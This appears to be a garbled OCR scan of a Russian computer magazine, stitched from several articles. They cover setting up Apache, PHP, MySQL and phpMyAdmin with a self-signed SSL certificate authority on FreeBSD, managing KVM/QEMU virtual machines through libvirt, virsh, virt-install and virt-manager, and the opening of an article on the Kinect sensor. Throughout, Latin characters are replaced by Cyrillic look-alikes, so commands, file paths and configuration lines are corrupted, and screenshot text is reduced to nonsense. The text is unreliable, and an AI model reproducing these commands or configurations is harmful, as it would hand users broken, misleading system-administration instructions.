<О1гесфогу "/Поте/ммм/ сё1-Б1п"> 
Сохраняем файл и создаем файл настроек РНР: 
# ср /чзг/1оса1/ефс/рИр.1п1-гесоттепаеЯ /изг/1оса1/ефс/рИр.1п1 
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УУМ/АСК 


Ги |] 
та 


о41п 9гоцр 


памте : 
(Геачме Гог аеГац1): 
 11т]: 
Гоч1и дгоцр 15 11м. моЦЩе 
1од1п с|!а55 [(ЧеГгац |1]: 
зпе11 ($51 с5П 
Номе 41гесфогу [/помех 1] 
Номе А1гесфогу регм1$$5101$5 
раззыога 
ап ему 
гапаом 


емроу 


Лт 


(Геаме 
Базей ацёНепфтсафтой” 
[(цезипо ) 


Гцесипао 2 


разсыогат 
раззыога 7 
раззыога : 
раззыогй ада1т: 


ЁНе ассоцп* аЁР*ег 
м 


пит 
Изегипаме 
Ггаззыога 
Ги11 МамЕ 
та 


\ 
= г= 
вк. 


1001 


бгоцр 
Нопте 
Ноте 
ле "тие СЗЛ 
Госкей .- ПО 

ОК? 


Создаем нового пользователя 


1 м 
„помех 11мм 


Нойе 


(цезипо). цез 


Этого будет достаточно для нормальной работы Араспе совместнос 
РНР. Теперь можно приступить кустановке Му5ЪО1|. Идем в порты и 
делаем следующее: 


# са /чзг/рогф$/дафаБазе/ту$9150-зегуег 
# таКе МТТН_ОРЕМ$ $1 =уе$ 1п$%а11 с1еап 


Создадим рудиментарный конфигурационный файл, которого хватит 
на первое время: 


#ее /еёс/ту. сп? 

[<11еп*] 

рог*=29912 

[му591а] 

рог*=29912 
6Б1па-адаге$$=127.0.0.1 


Добавим МУЗОЕ в автозагрузку и запустим сервер: 


# еспо 'ту$9]_епаб1е="УЕ$"" << /ефс/гс. соп 
# /ч5г/1оса1/ефс/гс.9/ту$а1-зегуег аг* 


Установим пароль на доступ к базе данных: 


# ту5а]1аат1п -и гооф раззмога пароль 
# туза1 -и гоо* -р 


Теперь МуъОЕ должна нормально функционировать, но управлять 
базами данных вручную не оченьудобно, ктому же, для некоторых это 
будетпервый опытустановки МуЗСЕ., аснаскоку разобраться с ней не 
так-то просто. Поэтому установим веб-интерфейс управления Му ОЕ 
под названием РНРМуАадтиип: 


# са /чзг/рогф$/дафаБазе /рИртуаат1п 
# таКе 1п${а11 с1еап 
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Ес по10д1ий) [$8]: %С5 


емрту 
[ч4е$]: 

[по 1: 

[по]: 


ггеа*10п” 


1ифо офмег 9гоцр$7 [Г]: 


И 


Гог ЧеРгац]%): 


[по ]: 


Поправим конфигурационный файл РНРМуАадгтит, указав пароль на 
доступ кмеб-интерфейсу: 


# са /чзг/1оса1 /ммм/рирМуАдт1 п 
# ср сопйФ. затр1е.1пс.рИр сопЯ.1пс.рИир 


Нее сопЯд.тс.рИр 
$СЕвВ[ '61омЯ$Н_зесгее'] = 'пароль’; 


Теперь вновь открываем конфигурационный файл Араспе и делаем 
следующее: 


1. В секцию <ИМодие а|!аз_тподще> добавляем следующую строку: 
А11а$ /рИртуадт1т /чзг/1оса1 /имм/рирМуАат1 п 
2. В конец секции <Огецогу> добавляем следующие строки: 


<О1гесфогу "/изг/1оса1 /ммм/рИрМуАдт1т" > 
Огаег а11ом,аепу 
А11ом Егом а11 

</О1гесфогу> 


Здесь вместо «АЦо\м/ Тгогп аЦ» можно добавить что-то вроде «АЦо\м/ 
Кот 123.456.789.0/12», чтобы разрешить доступ кРНРМуАагпит только 
из определенной подсети. 

Перезапускаем Араспе: 


# /ч5г/1оса1/ефс/гс.Ч/араспе22 гезФаг* 


Это все, теперь (ЦАМР должен работать. 


НТТРЗ 


РНРМуАагтит для корректной работы требует поддержку НТТРЪ, 
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Не забываем включить модуль АрасКе во время сборки РНР 


и вполне возможно, что в будущем тебе понадобится этот прото- 
кол для установления безопасного зашифрованного соединения 
между клиентом и сайтом. Поэтому сделаем так, чтобы Араспе его 
понимал. 

Для начала исправим конфигурационный файл Ореп55( (/е{с/з$И 
ореп$$(.спй, добавив в него следующие строки: 


# Каталог для хранения сертификатов 
1г = /гоо%/5$1СА 

# Срок действия сертификата (--10 лет) 
ефаи1*_Аау$ = 3650 


Теперь подготовим каталоги создадим сертификаты для собственного 
центра сертификации: 


# с4 /гоо* 

# мКа1г $$1СА 

# сптоЯ 700 $$1СА 

# сптоЧ 700 $$1СА 

# мКа1г рг1уафе 

# с4 $$1СА 

# ореп$$1 гед -пем -х509 -4ау$ 3650 -ехфеп$1оп$ \3_са \ 
-Кеуочц{ рг1уафе/саКеу .рет -оч{ сасег{.рет \ 
-сопйй /е{с/$$1/ореп$$1. сп 


Проверим, что сертификаты были созданы успешно: 


# 15$ -1 сасег*.рет рг1уа%е/сакКеу .рет 


Сгенерируем сертификаты для Араспе и поместим их в каталог/е(с/ 
55|: 


# са /гоот/$$1СА 
# ореп$$1 гед -пем -поде$ -оц{ имя_хоста-гед.рет \ 
-Кеуоц{ рг1уафе/имя_хоста-Кеу.рет -сопЯ» /ефс/$$1/ореп$$1. сп 


# ореп$$1 са -сопйя /ефс/$$1/ореп$$1.сп+ -ои* \ 
имя _хоста-сег*.рет -1п81е5 имя_хоста-геа.рет 
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# ср /гоо*/$$1СА/имя_хоста-сег*.рет /ефс/$$1/сге 
# ср /гоот/$$1СА/рг1уа*е/имя_хоста-Кеу.рет /ефс/$$1/Кеу 


Снова открываем конфигурационный файл АраспПе, находим следую- 
щую строку и раскомментируем ее: 


# ее /изг/оса/е{с/арасНе22/И{р9.соп! 
#Тпс1и4ае ефс/арасйе22/ехЕга/ИЕЕра-$$1.соп+ 


Вносим следующие изменения в файл /изг/\осаИе{с/араспе22/еж{га/ 
ВЕр-$$(.сопё: 


Нее /изг/оса/е{с/арасНе22/ежга/И(р-$$1.соп! 
# Имя НТТР$-сервера 
5егуегМате $$1.По${. сот 


# Путь до файла, содержащего сертификат и ключ 
5$. СегЕ1Нса*еЕ11е /ефс/$$1/сг&/уоцгИо${пате-сег{.рет 
55. СегЕ1Нса*еКеуЕ11е /ефс/$$1/Кеу/уоцгпо${пате-Кеу.рет 


# То же, что и в главном конфиге 
БоситепЕКоо* "/Поте/мим/ Чата" 


# Куда писать логи 
ЕггогГЕОР " /уаг/10о8/ВЕра-еггог.1о5" 
Тгап$+егЁо8 "/уаг/105/ИЕра-ассе$$.1о8" 


Перезапускаем Арасйе: 


# /чзг/1оса1/ефс/гс.Ч9/арасйе22 гезфаг* 


Что дальше? 


В этой статье я показал, как поднять полностью работоспособный 
стек (ПАМР набазе ЕгееВЗП [так что это скорее ЕАМР), и все, что 
тебе теперь нужно сделать, это скачать свой любимый сайтовый 
движок и развернуть его в каталог /попле/мллм//Ча(а [не забыв по- 
ложить скрипты в /Вопе/мллм/с9!-Б1п]. Все остальное возьмет на 
себя (НП) АМР. == 
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Виртуальный 


ПОЛИГОН 


Управляем фермой виртуальных серверов легко 


и непринужденно 


Эмулятор СЕМИ, работающий в связке с КУМ, — это отличная система виртуализации, с помощью 
которой можно не только легко создавать подручные виртуальные машины, но и организовывать 
целые фермы виртуальных серверов. Проблема только в том, что управлять такой фермой с по- 
мощью стандартных средств весьма затруднительно. 


Сложности всех администраторов, принявших решение использо- 
вать систему виртуализации на основе К\УМ и СЕМИ для управ- 
ления парком виртуальных машин, вытекают изтого простого 
факта, что сама по себе эта связка никогда не была рассчитана 

на подобное применение. Эмулятор ЧЕМУ был создан с целью 
предоставить пользователям простое и быстрое средство запуска 
виртуальных машин с целью отладки и ознакомления. Интерфейс 
К\М создан для использования возможностей аппаратной виртуа- 
лизации, реализуемой современными процессорами. Вместе они 
составляют систему, которая очень хорошо подходит для запуска 
одиночных виртуальных машин, но в принципе не предназначена 
для управления десятками и сотнями виртуальных окружений. 
Систему СЕМ О+КУ\УМ следует рассматривать только как ядро 
комплексной системы виртуализации, поверх которого должна 
быть построена более сложная инфраструктура для управления 
многими инстанциями ЧЕМИО. 


Уровнем выше 


Существует огромное количество самых разных систем управ- 
ления парками виртуальных машин, использующих ВЕМИ-+К\М. 
Начиная от самопальных скриптов, в спешке набросанных 
сисадминами и выложенными в Сеть, и заканчивая серьезными 
коммерческими программными комплексами уровня предприя- 
тия. Однако наше внимание заслуживают только те из них, которые 
в своей работе используют библиотеку ИБ\гЕ. 

[ибугЕ — это отлаженная и со всех сторон протестированная би- 
блиотека, с помощью которой любое приложение может быть легко 
обучено управлению виртуальными серверами. Поэтому система, 
основанная на ИБмгЕ, будет, во-первых, априори стабильнее и 
предсказуемее разработок, использующих свой собственный 
интерфейс управления. Во-вторых, ИБуг{ поддерживает кучу раз- 
личных систем виртуализации, начиная с КУМ и Хеп и заканчивая 
УМ\гаге и Ореп\Й. Это очевидный плюс, потому какесли в будущем 
планируется переезд на другую систему, менять придется не 
много (более того, инструменты, входящие в состав пакета ИБ\уг\, 
позволяют произвести миграцию между системами без проблем). 
В-третьих, ИБмг{ — это стандарт, систем управления ВМ наего 
основе будет становиться все больше и, если когда-то появится 
альтернатива выбранному сегодня решению, переезд будетабсо- 
лютно безболезненным. 

Следующие разделы статьи будут целиком и полностью посвяще- 
ны системам управления, основанным на ИБмгЕ, поэтому приве- 
денные в них инструкции подойдут для управления любым другим 
поддерживаемым ей эмулятором. 


МГИ 


Команда \!гзВ — один из главных инструментов управления ИБ\уи. 
Она входит в стандартную поставку самой библиотеки, поэтому из 
коробки доступна практически влюбом дистрибутиве. Кроме того, 
это единственный инструмент, который умеет задействовать все 
возможности ИБ\мгЕ, поэтому если с другими системами возникнут 
проблемы, мгзВ всегда придетна выручку. 

Для установки мг$П следует инсталлировать в систему пакет (Буи, 
а также все необходимые для работы с виртуальными машинами 
пакеты (в нашем случае это КУМ, ЧЕМУ, апзтазд и Бг9де-и($]}. 
Эти пакеты доступны в репозитории любого дистрибутива, поэтому 
для их установки необходимо выполнить всего одну команду (при- 
мер для Убип{и): 


$ си4о ар*-ве* 1п5{а11 Бг1аве-и*11$ апзмаза К\м \ 
дети 116\у1ге 116\у1г-61п 


Также нам пригодится инструмент под названием у"{-1п${аЦ, он 
нужен для создания файлов-описаний виртуальных окружений, 
которые понадобятся при работе с миг$В, но не могут быть созданы 
ей (предполагается, что приложения, использующие ИБ\и\, будут 
генерировать их сами]: 


$ и4д0 ар*-веф 1п$%а11 у1гЕ1п$Е 


Чтобы команда м!г$В и другие инструменты работали правильно, 
должен быть запущен демон ИБ\уг(а. 

Обычно пакетные менеджеры запускают его самостоятельно при 
установке пакета, но в некоторых системах (например, АгсйМпих] 
этого не происходит. Поэтому убедимся, что ИБм“{@ запущен: 


$ рзах | вгер 116\1г*а 


Если он не работает, запустим его (в некоторых системах вместо 
шк. д следует указать гс.4): 


$ ъидо Г/еёс/зипте. а/1тБутеЕа фагЕ 


Для проверки работоспособности всей системы выполним сле- 
дующие команды: 


$ зи4о м1г$Н --соппес* дети: ///зузет уег$1оп 
$ зи4о м1г$Н --соппесЕ дети: ///зузфет 11$ 
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Отладка мй-тзтай 


Утилита м{-т${аЦ не всегда работает безупречно. 
Чтобы разобраться, почему происходит ошибка 
запуска, используй флаг '-Ч', который принудит 
утилиту записывать всю отладочную информацию в 
файл -/ мгип5Уми-таЦ.[09. 


Если всев порядке, первая команда должна вывести 
нечто вроде этого: 


Скомпилировано на базе библиотеки: 11Б\1г 0.9.0 
Используется библиотека: 116\у1г 0.9.0 
Используется АРТ: ОЕМИ 0.9.0 

Выполняется гипервизор: ОЕМУ 0.14.0 


А вторая — пустой список виртуальных машин. Стоит 
попробовать запустить мг$П без аргумента '--соппесЁ 
[(зи40 мг®й уегтоп), чтобы ИБуг{ попыталась сама найти 
предпочтительную систему виртуализации. Если вывод 
будет совпадать, в дальнейшем можно не утруждать 
себя указанием опции '--соппесе'. Сразу скажу что ИБ 
позволяет управлять системой виртулизации удаленной 
стороны с помощью $5Н-туннеля. Делается это пример- 
но так (здесь опция '-с’ — это сокращение '--соппес!}: 


$ млиН -с \ 
дети+$ $1: / /гоо{@По${ .сот/зузфет команда 


Все приведенные далее команды могут быть выпол- 
нены таким же образом. Более того, «команду» можно 
вообще не указывать, тогда откроется шелл мгзВ. Он 
хорош, в частности, тем, что поддерживает авто- 
дополнение команд и имеет встроенную справку. 

Для создания первой виртуальной машины запустим 
мг -т${аЦ следующим образом: 


Отключение АСР! 


Далеко не каждая операционная система 
может нормально работать с подсистемой АСР, 
реализованной в СЕМИ. Чтобы отключить ее, 
просто передай опцию '--поаср! или '--поарис' 
(лучше обе] команде ми-т&аЦ. 


$ зи4о \1г*-1п$%а11 --соппесЕ дети: ///зуз*ет \ 
--пате \№т1 \ 
--гам 512 \ 
--УпС \ 
--0$-фуре 11пих 
--0$-уаг1ап* ибипфитауег1ск \ 
- -ассе]егате \ 
- -пефмогКк=пе{могк : деФаи11 \ 
--491$К \ 
ра п=/уаг/116/116\1г{/1таве$/\т1 .1тя , $17е=5 \ 
--сагот /$тр/ибипфи-10.10-5егуег-1386.1$0 \ 
- -поаифосоп$о1е 


Команда сгенерирует образ новой виртуальной машины 
и запустит его с помощью эмулятора ВЕМИ. Машина 
будет иметь имя уп71 (опция '--пате'), 512 Мб памяти 
'--гапл’), вывод ее дисплея будеттранслироваться по 
сети с помощью УМС-сервера (позже мы рассмотрим, 
как кнему подключиться]. Конфигурация виртуальной 
машины будет подобрана в расчете на оптимальную 
работу операционной системы Мпих ('--о$-{уре Ипих'] 

и конкретно дистрибутива УБип\и 10.10 ('--о$-уамап\ 
ибип{итауенск'}, по возможности будут задействованы 
средства аппаратной виртуализации ('--ассеегаке'). 
Опция '--пем/огК' предназначена для указания спосо- 
ба подключения виртуального окружения к сети. Всего 
существуеттри возможных варианта этой опции: 

1. Бтаде:имя_моста — подключение к внешней сети 


рее 


р по 
® В любой момент к 
виртуальной машине 
можно подключить 
Новый ДИСК: 
$идо \1г5$Н а Фасй-491$К 
--Аг1уег Я1е --фуре 
сагот --тоде геадоп1у 
/\аг/116/116\1гЕ/ 


1таве$ /сагот.1$0 $@с 


® Конфиг существую- 

щей виртуальной 

машины легко про- 

смотреть и исправить: 

# утг5И аитрхт1 \мт1 > 
—/\мт1. .хт1 

# 1 №11. хи1 


# у1"зИ сгеате \т1 .хт1 
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Главное окно У-тападег 


Настройка сетевого моста в 


Обипти 


1. Открываем файл /ес/пе\могКЛг(егасес, удаляем текущее 
содержимое и добавляем следующие строки (указав 
правильные [Р-адреса, маску и так далее}: 


аифо 1о 

1Касе 1о 1пеф ТоорБаск 

аифо Бг@ 

1Фасе 6г@ 1пеф $Фа*1с 
адаге$$ 192.168.0.10 
пефмогк 192.168.0.0 
пефта$К 255.255.255.0 
Бгоадсаз* 192.168.0.255 
бафемау 192.168.0.1 
6г1аге_ рог®$ ефв@ 
6г1аге_+а 9 
6г1а5е_Ве11о 2 
6г1а5е_тахаде 12 
Бг1аге_$р о++ 


2. Перезапускаем сеть: 
$ зидо /ефс/1п1.А/пемогК1т8 гезФаг* 
3. Останавливаем и отключаем ЧВсаБча: 


$ эиао /ефс/1п1е.а/ансаЬа $*ор 
$ эиао ира е-гс.а -+ айсаБа гетоуе 


через виртуальный сетевой мост. Виртуальная машина сможет 
принимать и инициировать соединения. Это идеальный вариант, 
но он требует дополнительной настройки [смотри врезку «На- 
стройка сетевого моста в ЧБип{и»). 

2. пе\могК:имя_сети — подключение к внутренней виртуальной 
сети. Машина будет помещена в изолированную виртуальную сеть, 
но сможет получить доступ к внешней сети, используя МАТ. Со- 
вершенно неприемлемый с практической точки зрения вариант, 
который удобен тем, что не требует какой-либо настройки. Опция 
«имя_сети» должна совпадать с именем файла в каталоге /маг/ИБ/ 
(бугУИпе\могК, плюс расширение «хпп(». Список имеющихся сетей 
можно получить, используя следующую команду: 


# у1пз$И пеф-11$+ --а11 


о [спать зови СО 


и УШт-ОГ -М 

РАТазуитет та ИНЬ Аааа вАе Пщещ 
ТЗ М ЕР 0.10 1.18 В. №0 2т-ТЕ 
т И 3. 45 781. М 2. 55 27.0 
реа вия | Убе оп Юва игОО 3. 84 111.1 193, м 3. ТЕ 
а Вы т.м 10. 55 ТВ, 5ы В. 5% 
НЕО дла м ый 1 лезу аа Иа” бы ИГ 1, 45 1.16 2,19 9.5 
а И ПТ 1. та 811.6 ТЕ, М 41.1 
Е № ат. вы Ти. &ы Зет. 1ы 11.5% 
ЕАН: Уфе ла ИЕгоцрАнЬЛСснуио 90 я. 9С 9. 10 В. 2 20. тк 
РАЮ Уи Оал, В, 9 ти, ам 59: 9 35.9 
ССБ: ибо Горов о 10 в. 65. 1, 5 й. 20 38.6% 
СТО | ИбеУА ЮО. ЭН. М 2#1.5М 70. 1м 29.0% 
72063532: УФаи/ за 16.00 2-11 17.02 36.4“ 


Команда \й-4 покажет занятость дисков всех вирту- 
альных машин 


3. ивег — подключение к сети, используя 5 БР. Удобен только 

в тех случаях, когда гостевая система должна быть запущена от 
имени непривилегированного пользователя. 

С помошью опции '--91$К’ мы заставляем ИБ\г{ создать новый 
образ диска, указывая путь до файла и его размер. Если бы мы 
хотели использовать уже существующий образ диска, то могли бы 
просто опустить опцию '517е’. Из других опций внимания заслужи- 
вает '5рагзе', с помощью которой можно указать, должен ли образ 
быть динамически расширяемым (5рагзе={гие, по умолчанию] или 
иметь фиксированный размер (5рагзе={а($е). 

В первом случае образ будет расти по мере его наполнения, но 
только до тех пор, пока его размер не достигнет указанного в оп- 
ЦИИ '517е'’. Во втором случае образ сразу будет иметь запрошенный 
размер. Это предпочтительный вариант для боевых серверов, так 
как, во-первых, на динамическое расширение тратятся ресурсы 
системы, а во-вторых, постоянный рост дисков может привести к 
израсходованию ресурсов в самый неподходящий момент. 

Также рекомендую сразу позаботиться о переносе каталога /маг/ 
(Б/ИБунИгтадез на [УМ-том или другой сервер (с помощью МЕ5 
или РОНМЕЕЕ5, например). Такты решишь многие проблемы, 
которые могут возникнуть в будущем. 

С помощью опции '--сЧгог' мы указали путь к установочному 
|5О-образу. Это плохой пример, потому как хранить установочные 
образы в каталоге /{ппр боевого сервера опрометчиво. Гораздо 
удобнее использовать для этой цели другую машину, просто указав 
ее адрес и каталогс предпочтительным 150-образом: 


--сагот РЕр: //По$*.сом/1таёе$ /иБип*и/ 
Аеще лучше указать адрес, содержащий образы ядра и пКга, 


которые произведут сетевую установку дистрибутива из офици- 
альных источников: 


- -1осае1оп Ир: //ЕЕр.и$5.аеб1ап.огё/аеб1ап/а1$%$/ефсп/ 
та1п/1п5{а11ег-ата64/ 


Но это, как говорится, в какой конфигурации что удобнее. По- 
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Я) устьнавнь г лок ль о ыблатали РО: Брьь малы ССВ] 
С} Иьлинрт синт учыньь брань иска 


Жазинить | феналая ыы 


рожать бости: | 312 ||. 948 
ыы 


о ВЫ Е 


а ВЫ | 


Моеьыть | 
Создаем новую виртуальную машину с помощью уй-тападег 


Фнаьа | ГОрзынишнть] 


следняя опция ('--поац(осоп$0(е'] отключает авто- 
матическое открытие консоли сразу после создания 
виртуальной машины. Также доступны опции '--усриз' 
и '--сризе{', которые позволяют управлять количе- 
ством ядер процессора внутри виртуальной машины и 
количеством доступных ей ядер физической машины 
(через запятую, начиная с нуля). 

Команда создаст описание виртуальной машины, по- 
меститего в файл /е{с/ИБ\гИдети/мт1.хпп[и запустит 
виртуальную машину. Проверить ее работоспособность 
можно с помощью уже упоминавшейся ранее команды 
‘ыг$в ($. Сам файл описания можно открыть в тексто- 
вом редакторе, чтобы просмотреть или изменить. Он 
имеет вполне читаемый и логичный формат. 

Если виртуальная машина запустилась, к ней можно 
подключиться с помощью инструмента мг{-мемиег, 
который можно найти в одноименном пакете: 


$ зи40 ар*-веф 1п$%а11 


$ м1гЕ-мтешег -с дети: ///зузЕет +е$ 


Расположение вашего установочного носителя 


О Использовать с0-ВОМ или 0\О 


й 


(©) Использовать |50 образ: 


Мог плз ога 50-8,2-ВЕТЕАЗЕ-1 396-52 1 150 


Е] включить хранилище для этой виртуальной машины 
{&} Создать образ диска на жестком диске компьютера 


Г 
2.3 @6 амайаЫе п Ве еб юсабоп 
Выделить весь диск 0) 


О выберите управляемое или другое существующее хранилище 


Естественно, запускать \м!{-п${аЦ лучше судаленной 
машины. Если все пошло хорошо, должно открыться 
окно, содержащее экран виртуальной машины и, соот- 
ветственно, инсталлятор выбранной ОС. 

После окончания установки виртуальная машина будет 
полностью готова к использованию, в нее можно будет 
войти с помощью команды ‘сопзо(е ут1", запросить 
информацию с помощью команды 'догпиптТо ут1', до- 
бавить в список авто-запуска (который происходит 

во время запуска демона ИБ\у“{а] командой 'ащоз{аг( 
уп?1', заморозить (команда '5а\е'], разморозить 
(‘гезигпе '}, завершить ["5Ни{Чо\м/п'}, запустить ('5{аг{'), 
уничтожить ('4е${гоу'], добавить или удалить сетевые 
интерфейсы (‘аЦасв-Чемсе’), добавить новые диски и 
многое другое, но самое главное — теперь виртуальную 
машину можно клонировать: 


$ зидо \1г*-с1опе \ 
- -соппес{=аети: ///зуз%ет -о \ут1 -п ут2 


В результате будет создана новая виртуальная машина 
ут2, конфигурация которой будет полностью повторять 


Хх Отменить _ Ченавад | ть 


› магптд 

5епих, по умолча- 
нию включенный в 
Гедога и некоторых 
других дистрибутивах, 
не позволит загрузить 
образы виртуальных 
машин, если они 
расположены не в ка- 
талоге /маг/ИБ/И\гУ 
|паде$. 
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файл ФртТральноя мешнна ФАД  ОТПрЫМИТЬ Комиеоцийко вучниы 


= [О "Е- 
Ргииь |Гуиедробыннсти  Бытустить та Во шегь мран 


Основные ПЕранетры 


т лы т 
рен ис: ВТО» 270-94-27. ава ъьйс 
ПИ маты Состомние 22 Быялисчнены 
ВЕ Орки Феъиьмена | 
ОЕ СООЫ 1 
ВЕ ме жет о 
Ели 
ШИ тАк В ЕО 
: Гигнереы-ьор. Киги 
ВИЙ зы: ка а д 
ыа; Зегыы 1 ыульетр. Ал Игла - Кут 
Е вдть 
ыы С втуеьйще СЕ *Пастреани Мамины 


Е фа вопыьг вн 


Инструмент тонкой настройки виртуальной машины в уй-тападег 


конфигурацию уп 1, но жесткий диску нее будет свой. С помощью 
‘мг(-сопе’ можно создать столько виртуальных машин, сколь- 

ко нужно, в полностью автоматическом режиме. Если же одной 
физической машины будет недостаточно для обслуживания всех 
имеющихся ВМ, можно поднять новый Ибм{-сервер и переселить 
особо прожорливых на него: 


$ и4о м1г$П т1егафе --11\уе \ут136 \ 
дети+$ $1 : //Во${2 .сом/зузет 


Не забыв проверить результат: 


$ эи4о м1г$П дети+$$Й: //Во${2.сот/зузфет 11$ 


С помощью мг5В управлять виртуальными серверами просто и 
удобно, но для людей, привыкших к СЦ и ммеб-системам, такой 
интерфейс может показаться слишком ограниченным и не нагляд- 
ным. Поэтому существует инструмент под названием м!" {-гпападег, 
который позволяет делать почти все то же самое с помощью удоб- 
ного графического интерфейса. 


© 
мй-птападег 
Программа м!г{-пападег (м! -пападег.ога} развивается в рамках 
проекта, который включает в себя не только саму программу, но и 
описанные выше инструменты м" -шп${аЦ, м -сопе и м -мемег. 
Более того, весь проект находится под покровительством компа- 
нии Кед На\, которая и была инициатором рождения библиотеки 
(Иб\гЕ. Поэтому, если говорить о каком-либо стандарте, то им 
можно считать именно этот набор инструментов. 
С практической точки зрения м! {-гпападег представляет собой 
простую [на вид] графическую программу, в верхней части кото- 
рой находятся инструменты управления виртуальными машина- 
ми, авнижней — список доступных эмуляторов (гипервизоров, 
в нашем случае там должен быть только ВСЕМИ] и виртуальных 
машин. 
Для создания новой виртуальной машины достаточно нажать 
кнопку «Новая», дать название машине, выбрать вариант уста- 
новки, установочный образ, указать тип ОС и ее версию, указать 


количество ОЗУ и ядер процессора (смотри скриншоты). Все то 

же самое, что и при использовании утилиты уп{-т${аЦ. Поста- 

вив галочку напротив пункта «Настроить конфигурацию перед 
установкой» можно сделать более конкретную настройку машины, 
включая выбор эмулируемых устройств и возможностей эмулято- 
ра, подключить дополнительные диски, произвести подстройку 
под ОС [например, отключить АСР! для Ме{В$О] и сделать многое 
другое. 

После этого в списке виртуальных машин появится новая ВМ. С 
помощью правого клика мышью виртуальную машину легко клони- 
ровать, перенести на другую машину, приостановить или выклю- 
чить. Рабочий стол машины в любой момент доступен с помощью 
кнопки «Открыть» в верней панели инструментов. 
Воспользовавшись пунктом «Свойства подключения» в меню 
«Правка» или кликнув по имени гипервизора в списке вирту- 
альных машин и выбрав в контекстном меню «Свойства», можно 
узнать подробности о машине, на которой работает эмулятор (тип 
процессора, количество ядер, объем памяти, нагрузка на систему}, 
а также настроить виртуальные сети, хранилище образов, убрать/ 
добавить новые образы и сетевые интерфейсы. 

С помощью пункта «Добавить соединение» в меню «Файл» можно 
создать подключение к другому гипервизору (хоть удаленному, 
хоть локальному] и все его виртуальные машины будут отображены 
вобщем списке. 


Другие инструменты 


Набор доступных инструментов управления виртуальными маши- 
нами не ограничивается только перечисленными выше програм- 
мами. На странице ИБ\уг". ога/аррз. Вип перечислены приложения, 
способные использовать ИБ\г в своей работе. Настоящих жемчу- 
жин среди них немного, но они есть: 

® у!г(-{ор [реор[е.гедба{. соп1/-г]опез/ми{-ор) — ТОР-подобная 
утилита для отображения списка самых «прожорливых» вирту- 
альных машин. Поддерживает почти все опции командной строки 
оригинального фор. 

® \У!г(- ЧЕ [реор[е.гед Ра. соп1/-гопез/м{-91] — аналог команды 41, 
показывающий процент занятости пространства на виртуальных 
жестких дисках. 
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упс-мемиег собственной персоной 


® \г(-р2у [реор[е.гедВа{. сот/-гопез/и-р2\] — инструмент для 
преобразования физических машин в виртуальные и обратно. 

® УГ-У2у [9.ЕедогаВоз{ед.ога/а(/ р=ун-у2у.9 И; а=зигогпагу] — 
программа для конвертирования образов, созданных другими 
системами виртуализации, в форматаети-К\ут. 


М/е-ориентированные системы 
управления 


Среди \\еб-ориентированных интерфейсов можно выделить япон- 
ский Кагезапзи!, который совсем недавно обновился до версии 
2.0. Внешне он представляет собой довольно привлекательный на 
вид \\еб2.0-интерфейс управления ВМ, поддерживающий массу 
возможностей и вполне способный заменить собой м! "-тападег. 


Кроме всего прочего, он поддерживает сбор статистики и мони- 
торинг, а также способен выводить на \еБ-страницу содержимое 
экрана гостевой ОС. 

Внутри Кагезапзи! представляет собой Ру{Поп-приложение с 
ЪОЕКе в качестве базы данных и /ауа-плагином И9Р{\УМС-\ама, 
используемым для вывода изображения, передаваемого с УМС- 
сервера ИБмг(а. Для построения интерактивного меб-интерфейса 
используется библиотека |биегу. 

Кроме того, я бы очень рекомендовал присмотреться к системе 
под названием АгсР!ре! (агсв'ре(рго|ес!.ога}, которая представ- 
ляет собой /]аббег-сервис, позволяющий рулить виртуальными 
окружениями буквально с помощью приказов, отдаваемых через 
|М-клиент, и, что самое главное, получать от них ответы и отчеты о 
состоянии и сбоях. 

Преимущество такого подхода в том, что он избавляет админи- 
стратора от необходимости слежения за парком виртуальных 
серверов или настройки какой-либо системы оповещения. Гипер- 
визоры и виртуальные серверы будут сами отчитываться перед 
хозяином с помощью отправки сообщений на |аббег-аккаунт. 
Кроме того, полнофункциональные браузеры, нужные для получе- 
ния доступа к полноценным системам управления виртуальными 


Во @+еь экран 


Тгу Бип 
Мои саг гу Биты дл РУНИ пак агту сНагоех (9 усмуг саге, Эгес Ну 
ГО № СО 


Се усгге гезфу. убу саг УЕ авулозне (9г МУЕеа 9 ОГ] усы 
слей оретаН я зузбеть, Тб Ролл Ее Вос Уп. 


па ОБупЕи 


машинами, доступны далеко не везде и не всегда, а простейший 
]аббег-клиент будет работать даже на бюджетном телефоне 2000 
года выпуска и позволит получить управление над виртуальным 
сервером даже в той ситуации, в которой все остальные инстру- 
менты окажутся недоступны. 

Кроме интерфейса, основанного на протоколе ХМРР, Агсв!ре!| 
может предложить админам и классический \\еб-интерфейс, 
который можно использовать тогда, когда под рукой есть нормаль- 
ный браузер. Возможности этого интерфейса довольно широки и 
ничуть не уступают описанному выше Кагезапзи!. Их официальный 
список выглядиттак: 

» Визуализация состояния и нагрузки на сервер в режиме реаль- 
ного времени; 

® Возможность отправки любых команд Агсб!ре(; 

® Возможность обмена сообщениями с другими пользователями 
системы; 

® Механизм посылки сообщений сразу группе серверов или ги- 
первизоров; 

® Безопасность подключения, обеспечиваемая механизмами 
ХМРР $25. 

Многие системы обслуживания облачной инфраструктуры основа- 
ны на ИБуи". Это, в частности, совместимые с Ататоп ЕС? системы 
Ецса(ур{и$ [ореп.еиса(ур\и$.сог] и Ореп{аск [ореп®{аск.ога), 
система для быстрого развертывания облачной инфраструктуры 
ОрепМоче [орепподе.асИуезуз.ога} и основанная натехнологиях 
Адоре Е(ех и бип/Огас(е /ауа система АМСоча [сотпипКу.а Мачо. 
со). 


Выводы 


За последние годы Шпих сделал большой шаг вперед во всем, что 
так или иначе связано с виртуализацией. 

СЕМЦи К\М, которые еще несколько лет назад казались игруш- 
кой для гиков и не воспринимались серьезно, теперь правят 
балом. == 
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Ш М Сергей Сильнов [ро@Китекау. сот} 


КСВ-камера 


ИК-проектор 


КИМЕСТ: 


РАЗМИНКА ДЛЯ ГИКА 


ИК-камера 


Разбираемся с новым девайсом и учимся писать 


Для Него приложения 


© Сенсор Ктес{ разработан для ХБох 360 и позволяет играть в игры 
без всяких приспособлений в руках. Появившись в ноябре 2010 года, 
он стал самым продаваемым электронным устройством в мире: за 
первые 2 месяца было продано более 10 млн штук. Изначально сен- 
сор работает лишь с консолью, но при помощи ловких движений рук 
ты сможешь заставить его работать сРС, аон поможеттебе поддер- 


живать физическую форму! 


Прежде чем втыкать Кипес{ в компьютер, разберемся с его вну- 
тренностями. Наш экземпляр, который дали помучить ребята 

из хоох-гопе.ги, разбирать мы не решились, да и незачем — на 
сайте Ихи.сога опубликовано подробное пошаговое руководство 


о том, как разобрать его до винтика. Итак, внутри у КтесГа нахо- 


дятся: 
1. Камера видимого диапазона — обычная КСВ-камера, похожа 
